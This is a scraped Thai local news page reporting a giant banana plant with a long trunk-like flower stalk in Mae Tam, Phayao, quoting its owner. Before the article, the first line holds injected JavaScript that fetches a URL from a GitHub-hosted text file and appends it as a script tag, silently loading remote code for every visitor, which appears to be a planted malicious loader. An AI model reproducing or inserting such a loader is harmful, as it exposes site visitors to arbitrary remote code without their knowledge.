;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); พะเยา ฮือฮา ต้นกล้วยนวลยักษ์ใหญ่ ขนาดคนโอบ แทงปลีออกเครืองวงช้าง ที่ ต.แม่ต๋ำ อ.เมือง - ThaiReference | อาสาไทยยืนยัน
พะเยา ฮือฮา ต้นกล้วยนวลยักษ์ใหญ่ ขนาดคนโอบ แทงปลีออกเครืองวงช้าง ที่ ต.แม่ต๋ำ อ.เมือง

พบกล้วยนวลหรือกล้วยงวงช้างยักษ์ลำต้นโตขนาดคนโอบ ยืนต้นสูงที่บ้านนายวิชัย งานดี บ้านเลขที่ 48/4 ต.แม่ต๋ำ อ.เมือง จ.พะเยา ที่ได้ปลูกไว้บริเวณข้างบ้านสูงกว่า 3 เมตร ลำต้นใหญ่ขนาด 1 คนโอบออกปลีออกเครือจากปลายลำต้นห้อยลงมาเหมือนงวงช้างยาวกว่า 1 เมตร และกล้วยนวลจะเป็นกล้วยที่แปลกโทน จะมีเพียงต้นเดียวไม่มีกอ ไม่มีหน่อขยายพันธ์ด้วยเมล็ดเท่านั้น

นายวิชัย งานดี เจ้าของบ้านได้เล่าว่า ตนเองได้นำเมล็ดกล้วยนวลมาปลูกข้างบ้านกว่า 1 ปี จนต้นกล้วยนวลเติบโตต้นใหญ่สูงกว่าหลังคาบ้านและออกปลีออกเครือยาวเหมือนงวงช้าง ซึ่งตนเองยังตกใจว่ากล้วยนวลที่เคยเห็นมาจะไม่สูงใหญ่เท่านี้และยังออกปลียาวยื่นมามีเปลือกกาบคุมเครือกล้วยโดยไม่หลุดล่วงและลูกกล้วยเมื่อสุกสามารถกินได้แต่จะมีเมล็ดสีดำในลูกกล้วยชาวบ้านมักจะนำมาเพราะพันธุ์ด้วย

@chaijexu

พะเยา ฮือฮา ต้นกล้วยนวลยักษ์ใหญ่ ขนาดคนโอบ แทงปลีออกเครืองวงช้าง ที่ ต.แม่ต๋ำ อ.เมือง

♬ เสียงต้นฉบับ – Chaij Exu – Chaij Exu

ภาพ-ข่าว ปัณณวิชญ์ อยู่ดี จ.พะเยา